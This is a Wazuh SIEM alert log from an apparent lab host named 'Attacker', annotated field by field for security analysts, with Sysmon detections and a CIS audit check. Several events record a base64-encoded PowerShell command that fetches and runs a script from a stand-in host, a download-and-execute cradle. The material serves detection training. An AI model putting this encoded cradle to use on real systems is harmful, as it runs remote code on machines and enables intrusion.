data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:00.003
ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00}
ProcessId: 13540
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fgj5ikc3.txg.ps1
CreationUtcTime: 2025-04-24 22:39:00.003
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:00.003 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd82-680a-910b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fgj5ikc3.txg.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:00.003 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534345.1765722 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26159 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Other Object Access Events"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Other Object Access Events"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 82 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534346.1769247 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:03.9444278Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285082 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:02.373
ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00}
ProcessId: 5364
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd82-680a-910b-000000000e00}
ParentProcessId: 13540
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:02.373 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd86-680a-940b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 86 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534346.1777314 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:04.3702749Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285088 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:04.338
ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00}
ProcessId: 5364
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4t3svkop.qwu.ps1
CreationUtcTime: 2025-04-24 22:39:04.338
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:04.338 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd86-680a-940b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4t3svkop.qwu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:04.338 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 83 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534350.1780079 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:08.2011382Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285123 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:06.839
ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00}
ProcessId: 1816
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd86-680a-940b-000000000e00}
ParentProcessId: 5364
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:06.839 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8a-680a-970b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 87 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534350.1788142 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:08.4452638Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285124 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:08.409
ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00}
ProcessId: 1816
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jawvpd1b.ilj.ps1
CreationUtcTime: 2025-04-24 22:39:08.409
